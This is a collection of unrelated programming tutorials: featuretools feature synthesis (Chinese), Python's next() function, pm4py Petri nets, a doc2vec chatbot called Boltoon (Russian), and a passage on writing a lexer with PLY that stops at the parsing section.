深度特征合成实现了多重转换和聚合操作(在featuretools的词汇中称为特征基元),通过分布在许多表中的数据来创建特征。像机器学习中的大多数观念一样,它是建立在简单概念基础上的复合型方法。通过一次学习一个构造块的示例,我们就会容易理解这种强大的方法。
首先,我们来看看我们的示例数据。 我们已经看到了上面的一些数据集,完整的表集合如下:
客户:即有关信贷联盟中客户的基本信息。每个客户在此数据框中只有一行。
贷款:即客户贷款。每项贷款在此数据框中只有自己单独一行的记录,但客户可能有多项贷款。
付款:即支付贷款。 每笔支付只有一行记录,但每笔贷款都有多笔支付记录。
如果我们有机器学习目标,例如预测客户是否将偿还未来贷款,我们希望将有关客户的所有信息组合到一个表中。这些表是相关的(通过client_id和loan_id变量),目前我们可以手动完成一系列转换和聚合过程。然而,不久之后我们就可以使用featuretools来自动化该过程。
实体和实体集
featuretools的前两个概念是实体和实体集。实体只是一个表(如果用Pandas库的概念来理解,实体是一个DataFrame(数据框))。
EntitySet(实体集)是表的集合以及它们之间的关系。可以将实体集视为另一个Python数据结构,该结构具有自己的方法和属性。)
我们可以使用以下命令在featuretools中创建一个空实体集:
import featuretools as ft
# Create new entityset
es = ft.EntitySet(id = 'clients')
现在我们添加实体。每个实体都必须有一个索引,该索引是一个包含所有唯一元素的列。也就是说,索引中的每个值只能出现在表中一次。
clients数据框中的索引是client_id,因为每个客户在此数据框中只有一行。 我们使用以下语法将一个现有索引的实体添加到实体集中:
# Create an entity from the client dataframe
# This dataframe already has an index and a time index
es = es.entity_from_dataframe(entity_id = 'clients', dataframe = clients, index = 'client_id', time_index = 'joined')
loans数据框还具有唯一索引loan_id,并且将其添加到实体集的语法与clients相同。但是,对于payments数据框,没有唯一索引。当我们将此实体添加到实体集时,我们需要传入参数make_index = True并指定索引的名称。此外,虽然featuretools会自动推断实体中每列的数据类型,但我们可以通过将列类型的字典传递给参数variable_types来覆盖它。
# Create an entity from the payments dataframe
# This does not yet have a unique index
es = es.entity_from_dataframe(entity_id = 'payments',
dataframe = payments,
variable_types = {'missed': ft.variable_types.Categorical},
make_index = True,
index = 'payment_id',
time_index = 'payment_date')
对于这个数据框,即使missed 的类型是一个整数,但也不是一个数字变量,因为它只能取2个离散值,所以我们告诉featuretools将缺失数据视作是一个分类变量。将数据框添加到实体集后,我们检查它们中的任何一个:
使用我们指定的修改模型能够正确推断列类型。接下来,我们需要指定实体集中的表是如何相关的。
数据表之间的关系
考虑两张数据表之间关系的最佳方式是用父对子的类比 。父与子是一对多的关系:每个父母可以有多个孩子。在数据表的范畴中,父表的每一行代表一位不同的父母,但子表中的多行代表的多个孩子可以对应到父表中的同一位父母。
例如,在我们的数据集中,clients客户数据框是loan 贷款数据框的父级,因为每个客户在客户表中只有一行,但贷款可能有多行。
同样,贷款loan数据是支付payments数据的父级,因为每笔贷款都有多笔付款。父级数据表通过共享变量与子级数据表关联。当我们执行聚合操作时,我们通过父变量对子表进行分组,并计算每个父项的子项之间的统计数据。
我们只需要指明将两张数据表关联的那个变量,就能用featuretools来建立表格见的关系 。
客户clients数据表和贷款loans数据表通过变量client_id
相互关联,而贷款loans数据表和支付payments数据表则通过变量loan_id相互关联。以下是建立关联并将其添加到entiytset的语法:
# Relationship between clients and previous loans
r_client_previous = ft.Relationship(es['clients']['client_id'],
es['loans']['client_id'])
# Add the relationship to the entity set
es = es.add_relationship(r_client_previous)
# Relationship between previous loans and previous payments
r_payments = ft.Relationship(es['loans']['loan_id'],
es['payments']['loan_id'])
# Add the relationship to the entity set
es = es.add_relationship(r_payments)
es
现在,在entityset中包含了三张数据表,以及三者间的关系。在添加entities并建立关联后,我们的entityset就算完成了,可以开始建立特征量了。
特征基元
在我们完全深入进行特征合成之前,我们需要了解特征基元。我们已经知道它们是什么了,但我们刚刚用不同的名字来称呼它们!这些只是我们用来形成新功能的基本操作:
聚合:基于父表与子表(一对多)关系完成的操作,按父表分组,并计算子表的统计数据。一个例子是通过client_id对贷款loan表进行分组,并找到每个客户的最大贷款额。
转换:在单个表上对一列或多列执行的操作。一个例子是在一个表中取两个列之间的差异或取一列的绝对值。
在featuretools中使用这些基元本身或堆叠多个基元,来创建新功能。下面是featuretools中一些特征基元的列表(我们也可以定义自定义基元)
这些原语可以单独使用,也可以组合使用来创建特征量。要使用指定的基元制作特征,我们使用ft.dfs函数(代表深度特征合成)。我们传入entityset,target_entity,这是我们要添加特征的表,选择的trans_primitives(转换)和agg_primitives(聚合):
# Create new features using specified primitives
features, feature_names = ft.dfs(entityset = es, target_entity = 'clients',
agg_primitives = ['mean', 'max', 'percent_true', 'last'],
trans_primitives = ['years', 'month', 'subtract', 'divide'])
结果是每个客户端的新特征数据框(因为我们使客户端成为target_entity)。例如,我们有每个客户加入的月份,这是由转换特征基元生成的:
我们还有许多聚合基元,例如每个客户的平均付款金额:
尽管我们只指定了一些特征基元,但featuretools通过组合和堆叠这些基元创建了许多新特征。
深度特征合成
我们现在已经做好准备来理解深度特征合成(dfs)。实际上,我们已经在之前的函数调用中执行了dfs!深度特征仅仅是堆叠多个基元的特征,而dfs是制作这些特征的过程名称。深度特征的深度是制作特征所需的基元的数量。
例如,MEAN(payments.payment_amount)列是深度为1的深层特征,因为它是使用单个聚合创建的。深度为2的特征是LAST(贷款(MEAN(payments.payment_amount))这是通过堆叠两个聚合来实现的:最后一个(最近的)在MEAN之上。这表示每个客户最近贷款的平均支付额。
我们可以将功能堆叠到我们想要的任何深度,但在实践中,我从未用过超过2的深度。在此之后,生成的特征就很难解释,但我鼓励任何有兴趣的人尝试“更深入” 。
我们不必手动指定特征基元,而是可以让featuretools自动为我们选择特征。我们可以使用相同的ft.dfs函数调用,但不传入任何特征基元:
# Perform deep feature synthesis without specifying primitives
features, feature_names = ft.dfs(entityset=es, target_entity='clients',
max_depth = 2)
features.head()
Featuretools为我们构建了许多新特征。虽然此过程会自动创建新特征,但仍需要数据科学家来弄清楚如何处理所有这些特征。例如,如果我们的目标是预测客户是否会偿还贷款,我们可以寻找与指定结果最相关的特征。此外,如果我们有领域知识,我们可以使用它来选择特定的特征基元或种子深度特征合成候选特征。
下一步
自动化特征工程虽然解决了一个问题,但又导致了另一个问题:特征太多。虽然在拟合模型之前很难说哪些特征很重要,但很可能并非所有这些特征都与我们想要训练模型的任务相关。此外,特征太多可能会导致模型性能不佳,因为一些不是很有用的特征会淹没那些更重要的特征。
特征过多的问题被称为维度诅咒 。随着特征数量的增加(数据的维度增加),模型越来越难以学习特征和目标之间的映射。实际上,模型执行所需的数据量随着特征数量呈指数级增长。
维度诅咒与特征缩减(也称为特征选择)相对应:删除不相关特征的过程。特征选择可以采用多种形式:主成分分析(PCA),SelectKBest,使用模型中的特征重要性,或使用深度神经网络进行自动编码。但是,减少功能是另一篇文章的另一个主题。目前,我们知道我们可以使用featuretools以最小的努力从许多表创建许多功能!
结论
与机器学习中的许多主题一样,使用featuretools的自动化特征工程是一个基于简单想法的复杂概念。使用实体集,实体和关系的概念,featuretools可以执行深度特征合成以新建特征。
聚合就是将深度特征合成依次将特征基元堆叠 ,利用了跨表之间的一对多关系,而转换是应用于单个表中的一个或多个列的函数,从多个表构建新特征。
在以后的文章中,我将展示如何使用这种技术解决现实中的问题,也就是目前正在Kaggle上主持的Home Credit Default Risk竞赛。请继续关注该帖子,同时阅读此介绍以开始参加比赛!我希望您现在可以使用自动化特征工程作为数据科学管道的辅助工具。模型的性能是由我们提供的数据所决定的,而自动化功能工程可以帮助提高建立新特征的效率。
有关featuretools的更多信息,包括高级用法,请查看在线文档:
https://docs.featuretools.com
要了解功能工具在实践中的使用方式,请阅读开源库背后的公司Feature Labs的工作:
https://www.featurelabs.com
|
In this guide, we are going to show you what is python next() function and how to use them to find the next item of an iterable.
To understand this example, you should have basic knowledge of the Python iter() function to get the iter object.
Python next function
Python next function is a built-in function that is used to find the next item of an iterable. You can add a default value, to return if the iterable reached the end.
Syntax
The syntax of next function in Python is:-
next(iterable, default)
Parameters
next function in Python accepts two parameters.
iterable:- Required, An iterable object
default:- Optional. A default value if the iterable reached the end.
Return Value
The return value of next function in Python is next item of iterable.
Python next example
Here we will see some example to understand next function in Python.
Example 1:
#List iterable
my_iterable = ['Python', 'C#', 'Java', 'PHP', 'Ruby']
#Create iterator object.
iter_object = iter(my_iterable)
print(next(iter_object))
print(next(iter_object))
print(next(iter_object))
print(next(iter_object))
print(next(iter_object))
Output
PythonC#JavaPHPRuby
Example 2:
#List iterable
my_iterable = ['Python', 'C#', 'Java', 'PHP', 'Ruby']
#Create iterator object.
iter_object = iter(my_iterable)
for i in range(len(my_iterable)):
print(next(iter_object))
Output
PythonC#JavaPHPRuby
Example 3:
Here we will use next function with default value.
#List iterable
my_iterable = ['Python', 'C#', 'Java', 'PHP', 'Ruby']
#Create iterator object.
iter_object = iter(my_iterable)
for i in range(len(my_iterable) + 1):
print(next(iter_object, 'HTML'))
output
PythonC#JavaPHPRubyHTML
Conclusion
In this article, you have learned all about the Python next() function to getting the next item of iterable.
To understand the next function, you should have knowledge of the Python iter() function.
If you like this article, please share and keep visiting for further python built-in functions tutorials.
Python built-in functions
For more information:- Click Here
|
Petri nets are one of the most common formalism to express a process model. A Petri net is a directed bipartite graph, in which the nodes represent transitions and places. Arcs are connecting places to transitions and transitions to places, and have an associated weight. A transition can fire if each of its input places contains a number of tokens that is at least equal to the weight of the arc connecting the place to the transition. When a transition is fired, then tokens are removed from the input places according to the weight of the input arc, and are added to the output places according to the weight of the output arc.
A marking is a state in the Petri net that associates each place to a number of tokens and is uniquely associated to a set of enabled transitions that could be fired according to the marking.
Process Discovery algorithms implemented in pm4py returns a Petri net along with an initial marking and a final marking. An initial marking is the initial state of execution of a process, a final marking is a state that should be reached at the end of the execution of the process.
Importing and exporting
Petri nets, along with their initial and final marking, can be imported/exported from the PNML file format. The following code can be used to import a Petri net along with the initial and final marking. In particular, the Petri net related to running-example process is loaded from the test folder:
import os from pm4py.objects.petri.importer import pnml as pnml_importer net, initial_marking, final_marking = pnml_importer.import_net(os.path.join("tests","input_data","running-example.pnml"))
The Petri net is visualized using the Petri net visualizer:
from pm4py.visualization.petrinet import factory as pn_vis_factory gviz = pn_vis_factory.apply(net, initial_marking, final_marking) pn_vis_factory.view(gviz)
A Petri net can be exported along with only its initial marking:
from pm4py.objects.petri.exporter import pnml as pnml_exporter pnml_exporter.export_net(net, initial_marking, "petri.pnml")
And along with both its initial marking and final marking:
pnml_exporter.export_net(net, initial_marking, "petri_final.pnml", final_marking=final_marking)
Petri Net properties
The list of transitions enabled in a particular marking can be obtained using the following code:
from pm4py.objects.petri import semantics transitions = semantics.enabled_transitions(net, initial_marking)
The function print(transitions) reports that only the transition register request is enabled in the initial marking in the given Petri net. To obtained all places, transitions, and arcs of the Petri net, the following code can be used:
places = net.places transitions = net.transitions arcs = net.arcs
Each place has a name and a set of input/output arcs (connected at source/target to a transition). Each transition has a name and a label and a set of input/output arcs (connected at source/target to a place). The following code prints for each place the name, and for each input arc of the place the name and the label of the corresponding transition:
for place in places: print("\nPLACE: "+place.name) for arc in place.in_arcs: print(arc.source.name, arc.source.label)
The output starts with the following:
PLACE: sink 47 n10 register request n16 reinitiate request PLACE: source 45 ...
Similarly, the following code prints for each transition the name and the label, and for each output arc of the transition the name of the corresponding place:
for trans in transitions: print("\nTRANS: ",trans.name, trans.label) for arc in trans.out_arcs: print(arc.target.name)
For the running example the output starts with the following:
TRANS: n14 examine thoroughly sink 54 TRANS: n15 decide middle 49 ...
Creating a new Petri net
In this section, an overview of the code necessary to create a new Petri net with places, transitions, and arcs is provided. A Petri net object in pm4py should be created with a name. For example, this creates a Petri net with name new_petri_net
# creating an empty Petri net from pm4py.objects.petri.petrinet import PetriNet, Marking net = PetriNet("new_petri_net")
Also places need to be named upon their creation:
# creating source, p_1 and sink place source = PetriNet.Place("source") sink = PetriNet.Place("sink") p_1 = PetriNet.Place("p_1")
To be part of the Petri net they are added to it:
net.places.add(source) net.places.add(sink) net.places.add(p_1)
Similar to the places, transitions can be created. However, they need to be assigned a name and a label:
t_1 = PetriNet.Transition("name_1", "label_1") t_2 = PetriNet.Transition("name_2", "label_2")
They should also be added to the Petri net:
net.transitions.add(t_1) net.transitions.add(t_2)
The following code is useful to add arcs in the Petri net. Arcs can go from place to transition or from transition to place. The first parameter specifies the starting point of the arc, the second parameter its target and the last parameter states the Petri net it belongs to.
from pm4py.objects.petri import utils utils.add_arc_from_to(source, t_1, net) utils.add_arc_from_to(t_1, p_1, net) utils.add_arc_from_to(p_1, t_2, net) utils.add_arc_from_to(t_2, sink, net)
To complete the Petri net an initial and possibly a final marking need to be defined. In the following, we define the initial marking to contain 1 token in the source place and the final marking to contain 1 token in the sink place:
from pm4py.objects.petri.petrinet import Marking initial_marking = Marking() initial_marking[source] = 1 final_marking = Marking() final_marking[sink] = 1
The resulting Petri net along with the initial and final marking could be exported:
from pm4py.objects.petri.exporter import pnml as pnml_exporter pnml_exporter.export_net(net, initial_marking, "createdPetriNet1.pnml", final_marking=final_marking)
Or visualized:
from pm4py.visualization.petrinet import factory as pn_vis_factory gviz = pn_vis_factory.apply(net, initial_marking, final_marking) pn_vis_factory.view(gviz)
To obtain a specific output format (e.g. svg or png) a format parameter should be provided to the algorithm. The following code explains how to obtain an SVG representation of the Petri net:
from pm4py.visualization.petrinet import factory as pn_vis_factory parameters = {"format":"svg"} gviz = pn_vis_factory.apply(net, initial_marking, final_marking, parameters=parameters) pn_vis_factory.view(gviz)
Instead of opening visualization of the model directly it can also be saved using the following code:
from pm4py.visualization.petrinet import factory as pn_vis_factory parameters = {"format":"svg"} gviz = pn_vis_factory.apply(net, initial_marking, final_marking, parameters=parameters) pn_vis_factory.save(gviz, "alpha.svg")
|
Данный торговый робот в автоматическом режиме торгует на бирже EXMO по краям стаканов с заданным спредом. Основной задачей бота является ознакомление пользователей…
Несколько лет назад было опубликовано интервью, в котором говорят об искусственном интеллекте и, в частности, о чат-ботах. Респондент подчеркивает, что чат-боты не общаются, а имитирует общение.
В них заложено ядро разумных микродиалогов вполне человеческого уровня и построен коммуникативный алгоритм постоянного сведения разговора к этому ядру. Только и всего.
На мой взгляд, в этом что-то есть…
Тем не менее, о чат-ботах много говорят на Хабре. Они могут быть самые разные. Популярностью пользуются боты на базе нейронных сетей прогнозирования, которые генерируют ответ пословно. Это очень интересно, но затратно с точки зрения реализации, особенно для русского языка из-за большого количества словоформ. Мной был выбран другой подход для реализации чат-бота Boltoon.
Boltoon работает по принципу выбора наиболее семантически близкого ответа из предложенной базы данных с последующей обработкой. Этот подход имеет ряд преимуществ:
Быстрота работы;
Чат-бот можно использовать для разных задач, для этого нужно загрузить новую базу;
Боту не требуется дообучение после обновления базы.
Как это работает?
Есть база данных с вопросами и ответами на них.
Необходимо, чтобы бот хорошо распознавал смысл введенных фраз и находил похожие в базе. Например, «как дела?», «как ты?», «как дела у тебя?» значат одно и то же. Т.к. компьютер хорошо работает с числами, а не с буквами, поиск соответствий между введенной фразой и имеющимися нужно свести к сравнению чисел. Требуется перевести всю колонку с вопросами из базы данных в числа, вернее, в векторы из N действительных чисел. Так все документы получат координаты в N-мерном пространстве. Представить его затруднительно, но можно снизить размерность пространства до 2 для наглядности.
В том же пространстве находим координату введенной пользователем фразы, сравниваем ее с имеющимися по косинусной метрике и находим ближайшую. На такой простой идее основан Boltoon.
Теперь обо всем по порядку и более формальным языком. Введем понятие «векторное представление текста» (word embeddings) – отображение
слова из естественного языка в вектор фиксированной длины (обычно от 100 до 500 измерений, чем выше это значение, тем представление точнее, но сложнее его вычислить).
Например, слова «наука», «книга» могут иметь следующее представление:
v(«наука») = [0.956, -1.987…]v(«книга») = [0.894, 0.234…]
Для данной задачи более всего подходит распределенная модель представления текста. Представим, что есть некое «пространство смыслов» — N-мерная сфера, в которой каждое слово, предложение или абзац будут точкой. Вопрос в том, как его построить?
В 2013 году появилась статья «Efficient Estimation of Word Representations in Vector Space», автор Томас Миколов, в которой он говорит о word2vec. Это набор алгоритмов для нахождения распределенного представления слов. Так каждое слово переводится в точку в некотором семантическом пространстве, причем алгебраические операции в этом пространстве соответствуют операциям над смыслом слов (поэтому используют слово семантическое).
На картинке отображено это очень важное свойство пространства на примере вектора «женственности». Если от вектора слова «король» вычесть вектор слова «мужчина» и прибавить вектор слова «женщина», то получим «королеву». Больше примеров Вы можете найти в лекциях Яндекса, также там представлено объяснение работы word2vec «для людей», без особой математики.
На Python это выглядит примерно так (потребуется установить пакет gensim).
import gensim
w2v_fpath = "all.norm-sz100-w10-cb0-it1-min100.w2v"
w2v = gensim.models.KeyedVectors.load_word2vec_format(w2v_fpath, binary=True, unicode_errors='ignore')
w2v.init_sims(replace=True)
for word, score in w2v.most_similar(positive=[u"король", u"женщина"], negative=[u"мужчина"]):
print(word, score)
Здесь используется уже построенная модель word2vec проектом Russian Distributional Thesaurus
Получим:
королева 0.856020450592041 бургундская 0.8100876212120056 регентша 0.8040660619735718 клеменция 0.7984248995780945 короля 0.7981560826301575 ангулемская 0.7949156165122986 королевская 0.7862951159477234 анжуйская 0.7808529138565063 лотарингская 0.7741949558258057 маркграфиня 0.7644592523574829
Подробнее рассмотрим ближайшие к «королю» слова. Существует ресурс для поиска семантически связанных слов, результат выводится в виде эго-сети. Ниже представлены 20 ближайших соседей для слова «король».
Модель, которую предложил Миколов очень проста – предполагается, что слова, находящиеся в схожих контекстах, могут значить одно и то же. Рассмотрим архитектуру нейронной сети.
Word2vec использует один скрытый слой. Во входном слое установлено столько нейронов, сколько слов в словаре. Размер скрытого слоя – размерность пространства. Размер выходного слоя такой же, как входного. Таким образом, считая, что словарь для обучения состоит из V слов и N размерность векторов слов, веса между входным и скрытым слоем образуют матрицу SYN0 размера V×N. Она представляет собой следующее.
Каждая из V строк является векторным N-мерным представлением слова.
Аналогично, веса между скрытым и выходным слоем образуют матрицу SYN1 размера N×V. Тогда на входе выходного слоя будет:
где
– j-ый столбец матрицы SYN1.
Скалярное произведение – косинус угла между двумя точками в n-мерном пространстве. И эта формула показывает, как близко находятся векторы слов. Если слова противоположные, то это значение -1. Затем используем softmax – «функцию мягкого максимума», чтобы получить распределение слов.
С помощью softmax word2vec максимизирует косинусную меру между векторами слов, которые встречаются рядом и минимизирует, если не встречаются. Это и есть выход нейронной сети.
Чтобы лучше понять, как работает алгоритм, рассмотрим корпус для обучения, состоящий из следующих предложений:
«Кот увидел собаку», «Кот преследовал собаку», «Белый кот взобрался на дерево».
Словарь корпуса содержит восемь слов: [«белый», «взобрался», «дерево», «кот», «на», «преследовал», «собаку», «увидел»]
После сортировки в алфавитном порядке на каждое слово можно ссылаться по его индексу в словаре. В этом примере нейронная сеть будет иметь восемь входных и выходных нейронов. Пусть будет три нейрона в скрытом слое. Это означает, что SYN0 и SYN1 будут соответственно 8×3 и 3×8 матрицами. Перед началом обучения эти матрицы инициализируются небольшими случайными значениями, как это обычно бывает при обучении. Пусть SYN0 и SYN1 инициализированы так:
Предположим, нейронная сеть должна найти отношение между словами «взобрался» и «кот». То есть, сеть должна показывать высокую вероятность слова «кот», когда «взобрался» подается на вход сети. В терминологии компьютерной лингвистики слово «кот» называется центральное, а слово «взобрался» — контекстное.
В этом случае входной вектор X будет
(потому что «взобрался» находится вторым в словаре). Вектор слова «кот» —
.
При подаче на вход сети вектора, представляющего «взобрался», вывод на нейронах скрытого слоя можно вычислить так:
Обратите внимание, что вектор H скрытого слоя равен второй строке матрицы SYN0. Таким образом, функция активации для скрытого слоя – это копирование вектора входного слова в скрытый слой.
Аналогично для выходного слоя:
Нужно получить вероятности слов на выходном слое,
для
, которые отражают отношение центрального слова с контекстным на входе. Для отображения вектора в вероятность, используют softmax. Выход j-го нейрона вычисляется следующим выражением:
Таким образом вероятности для восьми слов в корпусе равны: [0,143073 0,094925 0,114441 0,1111660,14492 0,122874 0,119431 0,1448800], вероятность «кота» равна 0,111166 (по индексу в словаре).
Так мы сопоставили каждому слову вектор. Но нам нужно работать не со словами, а со словосочетаниями или с целыми предложениями, т.к. люди общаются именно так. Для это существует Doc2vec (изначально Paragraph Vector) – алгоритм, который получает распределенное представление для частей текстов, основанный на word2vec. Тексты могут быть любой длины: от словосочетания до абзацев. И очень важно, что на выходе получаем вектор фиксированной длины.
На этой технологии основан Boltoon. Сначала мы строим 300-мерное семантическое пространство (как упоминалось выше, выбирают размерность от 100 до 500) на основе русскоязычной Википедии (ссылка на дамп).
Еще немного Python.
model = Doc2Vec(min_count=1, window=10, size=100, sample=1e-4, workers=8)
Создаем экземпляр класса для последующего обучения с параметрами:
min_count: минимальная частота появления слова, если частота ниже заданной – игнорировать
window: «окно», в котором рассматривается контекст
size: размерность вектора (пространства)
sample: максимальная частота появления слова, если частота выше заданной – игнорировать
workers: количество потоков
model.build_vocab(documents)
Строим таблицу словарей. Documents – дамп Википедии.
model.train(documents, total_examples=model.corpus_count, epochs=20)
Обучение. total_examples – количество документов на вход. Обучение проходит один раз. Это ресурсоемкий процесс, строим модель из 50 МБ дампа Википедии (мой ноутбук с 8 ГБ RAM больше не потянул). Далее сохраняем обученную модель, получая эти файлы.
Как упоминалось выше, SYN0 и SYN1 – матрицы весов, образованные во время обучения. Эти объекты сохранены в отдельные файлы с помощью pickle. Их размер пропорционален N×V×W, где N – размерность вектора, V – количество слов в словаре, W – вес одного символа. Из этого получился такой большой размер файлов.
Возвращаемся к базе данные с вопросами и ответами. Находим координаты всех фраз в только что построенном пространстве. Получается, что с расширением базы данных не придется переучивать систему, достаточно учитывать добавленные фразы и находить их координаты в том же пространстве. Это и есть основное достоинство Boltoon’а – быстрая адаптация к обновлению данных.
Теперь поговорим об обратной связи с пользователем. Найдем координату вопроса в пространстве и ближайшую к нему фразу, имеющуюся в базе данных. Но здесь возникает проблема поиска ближайшей точки к заданной в N-мерном пространстве. Предлагаю использовать KD-Tree (подробнее о нем можно почитать здесь).
KD-Tree (K-мерное дерево) – структура данных, которая позволяет разбить K-мерное пространство на пространства меньшей размерности посредством отсечения гиперплоскостями.
from scipy.spatial import KDTree
def build_tree(self, ethalon):
return KDTree(list(ethalon.values()))
Но оно имеет существенный недостаток: при добавлении элемента перестройка дерева осуществляется за O(NlogN) в среднем, что долго. Поэтому Boltoon использует «ленивое» обновление — перестраивает дерево каждые M добавлений фраз в базу данных. Поиск происходит за O(logN).
Для дообучения Boltoon’a был введен следующий функционал: после получения вопроса отправляется ответ с двумя кнопками для оценки качества.
В случае отрицательного ответа, пользователю предлагается скорректировать его, и исправленный результат заносится в базу данных.
Пример диалога с Boltoon’ом с использованием фраз, которых нет в базе данных.
Конечно, это сложно назвать «умом», никаким разумом Boltoon не обладает. Ему далеко до топовых ботов вроде Siri или недавней Алисы, но это не делает его бесполезным и неинтересным, в конце концов, это студенческий проект в рамках летней практики, созданный одним человеком. В дальнейшем, я планирую прикрутить модуль обработки ответов (согласование с полом собеседника, например), запоминание контекста разговора (в рамках нескольких предшествующих сообщений) и обработку опечаток. Надеюсь, получится более разумный Boltoon 2.0. Но это уже разговор для следующей статьи.
P.S. Вы можете потестировать Boltoon’а в telegram по ссылке @boltoon_bot, только не забывайте оценивать каждый полученный ответ, иначе последующие Ваши сообщения будут проигнорированы. И я вижу все логи, кто и что написал, так что давайте соблюдать рамки приличия.
|
Making your own programming language with Python
Making your own programming language with Python
Why make your own language?
When you write your own programming language, you control the entire programmer experience.
This allows you to shape exact how each aspect of your language works and how a developer interacts with it.
This allows you to make a language with things you like from other languages and none of the stuff you don't.
In addition, learning about programming language internals can help you better understand the internals of programming languages you use every day, which can make you a better programmer.
How programming languages work
Every programming language is different in the way it runs, but many consist of a couple fundamental steps: lexing and parsing.
Introduction to Lexing
Lexing is short for LEXical analysis.
The lex step is where the language takes the raw code you've written and converts it into an easily parsable structure.
This step interprets the syntax of your language and turns next into special symbols inside the language called tokens.
For example, let's say you have some code you want to parse. To keep it simple I'll use python-like syntax, but could be anything. It doesn't even have to be text.
# this is a commenta = (1 + 1)
A lexer to parse this code might do the following:
Discard all comments
Produce a token that represents a variable name
Produce left and right parenthesis tokens
Convert literals like numbers or strings to tokens
Produce tokens for nath operations like + - * /(and maybe bitwise/logical operators as well)
The lexer will take the raw code and interpret it into a list of tokens.
The lexer can also be used to insure that two pieces of code that may be different, like 1 + 1 and 1+1 are still parsed the same way.
For the code above, it might generate tokens like this:
NAME(a) EQUALS LPAREN NUMBER(1) PLUS NUMBER(2) RPAREN
Tokens can be in many forms, but the main idea here is that they are a standard and easy to parse way of representing the code.
Introduction to Parsing
The parser is the next step in the running of your language.
Now that the lexer has turned the text into consistent tokens, the parser simplifies and executes them.
Parser rules recognize a sequence of tokens and do something about them.
Let's look at a simple example for a parser with the same tokens as above.
A simple parser could just say:
If I see the GREETtoken and then aNAMEtoken, printHello,and the the name.
A more complicated parser aiming to parse the code above might have these rules, which we will explore later:
Try to classify as much code as possible as an expression. By "as much code as possible" I mean the parser will first try to consider a full mathematical operation as an expression, and then if that fails convert a single variable or number to an expression. This ensure that as much code as possible will be matched as an expression. The "expression" concept allows us to catch many patterns of tokens with one piece of code. We will use the expression in the next step.
Now that we have a concept of an expression, we can tell the parser that if it sees the tokens NAME EQUALSand then an expression, that means a variable is being assigned.
Using PLY to write your language
What is PLY?
Now that we know the basics of lexing and parsing, lets start writing some python code to do it.
PLY stands for Python Lex Yacc.
It is a library you can use to make your own programming language with python.
Lex is a well known library for writing lexers.
Yacc stands for "Yet Another Compiler Compiler" which means it compiles new languages, which are compilers themself.
This tutorial is a short example, but the PLY documentation is an amazing resource with tons of examples. I would highly recommend that you check it out if you are using PLY.
For this example, we are going to be building a simple calculator with variables. If you want to see the fully completed example, you can fork this repl: [TODO!!]
Lexing with PLY lex
Lexer tokens
Lets start our example! Fire up a new python repl and follow along with the code samples.
To start off, we need to import PLY:
from ply import lex, yacc
Now let's define our first token. PLY requires you to have a tokens list which contains every token the lexer can produce. Let's define our first token, PLUS for the plus sign:
tokens = [
'PLUS',
]
t_PLUS = r'\+'
A string that looks like r'' is special in python. The r prefix means "raw" which includes backslashes in the string. For example, to make define the string \+ in python, you could either do '\\+' or r'\+'. We are going to be using a lot of backslashes, so raw strings make things a lot easier.
But what does \+ mean?
Well in the lexer, tokens are mainly parsed using regexes.
A regex is like a special programming language specifically for matching patterns in text.
A great resource for regexes is regex101.com where you can test your regexes with syntax highlighting and see explanations of each part.
I'm going to explain the regexes included in this tutorial, but if you want to learn more you can play around with regex101 or read one of the many good regex tutorials on the internet.
The regex \+ means "match a single character +".
We have to put a backshlash before it because + normally has a special meaning in regex so we have to "escape" it to show we want to match a + literally.
We are also required to define a function that runs when the lexer encounters an error:
def t_error(t):
print(f"Illegal character {t.value[0]!r}")
t.lexer.skip(1)
This function just prints out a warning when it hits a character it doesn't recognize and then skips it (the !r means repr so it will print out quotes around the character).
You can change this to be whatever you want in your language though.
Optionally, you can define a newline token which isn't produced in the output of the lexer, but keeps track of each line.
def t_newline(t):
r'\n+'
t.lexer.lineno += len(t.value)
Since this token is a function, we can define the regex in docstring of the function instead.
The function takes a paramater t, which is a special object representing the match that the lexer found. We can access the lexer using the the t.lexer attribute.
This function matches at least one newline character and then increases the line number by the amount that it sees. This allows the lexer to known what line number its on at all times using the lexer.lineno variable.
Now we can use the line number in our error function:
def t_error(t):
print(f"Illegal character {t.value[0]!r} on line {t.lexer.lineno}")
t.lexer.skip(1)
Let's test out the lexer!
This is just some temporary code, you don't have to know what this code does, because once we implement a parser, the parser will run the lexer for you.
lexer = lex.lex()
lexer.input('+')
for token in lexer:
print(token)
Play around with the value passed to lex.input.
You should notice that any character other than a plus sign makes the error message print out, but doesn't crash the program.
In your language, you can make it gracefully ignore lex errors like this or make it stop running by editing the t_error function.
If you add more lines to the input string, the line number in the error message should change.
More complicated tokens
Let's delete the test token add some more complicated tokens.
Replace your tokens list and the t_PLUS line with the following code:
reserved_tokens = {
'greet': 'GREET'
}
tokens = list(reserved_tokens.values()) + [
'SPACE'
]
t_SPACE = r'[ ]'
def t_ID(t):
r'[a-zA-Z_][a-zA-Z0-9_]*'
if t.value in reserved_tokens:
t.type = reserved_tokens[t.value]
else:
t.type = 'NAME'
return t
Let's explore the regex we have in the t_ID function.
This regex is more complicated that the simple ones we've used before.
First, we have [a-zA-Z_]. This is a character class in regex. It means, match any lowercase letter, uppercase letter, or underscore.
Next we have [a-zA-Z0-9_]. This is the same as above except numbers are also included.
Finally, we have *. This means "repeat the previous group or class zero to unlimited times".
Why do we structure the regex like this?
Having two separate classes makes sure that the first one must match for it to be a valid variable.
If we exclude numbers from the first class, it not only doesn't match just regular numbers, but makes sure you can't start a variable with a number.
You can still have numbers in the variable name, because they are matched by the second class of the regex.
In the code, we first have a dictionary of reserved names.
This is a mapping of patterns to the token type that they should be.
The only one we have says that greet should be mapped to the GREET token.
The code that sets up the tokens list takes all of the possible reserved token values, in this is example its just ['GREET'] and adds on ['SPACE'], giving us ['GREET', 'SPACE'] automatically!
But why do we have to do this? Couldn't we just use something like the following code?
# Don't use this code! It doesn't work!
t_GREET = r'greet'
t_SPACE = r'[ ]'
t_NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'
Actually, if we used that code, greet would never be matched! The lexer would match it with the NAME token. In order to avoid this, we define a new type of token which is a function. This function has the regex as its docstring and is passed a t paramater. This paramater has a value attribute which is the pattern matched.
The code inside this function simply checks if this value is one of the special reserved names we defined before. If it is, we set the special type attribute of the t paramter. This type controls the type of token which is produced from the pattern. When it sees the name greet, it will see greet is in the reserved names dictionary and produce a token type of GREET because that is the corresponding value in the dictionary. Otherwise, it will produce a NAME token because this is a regular variable.
This allows you to add more reserved terms easily later, its as simple as adding a value to the dictionary.
If needed, you could make also make the key of the reserved names dicitonary a regex and the match each regex against t.value in the function.
If you want to change these rules for your language, feel free!
Parsing with PLY yacc
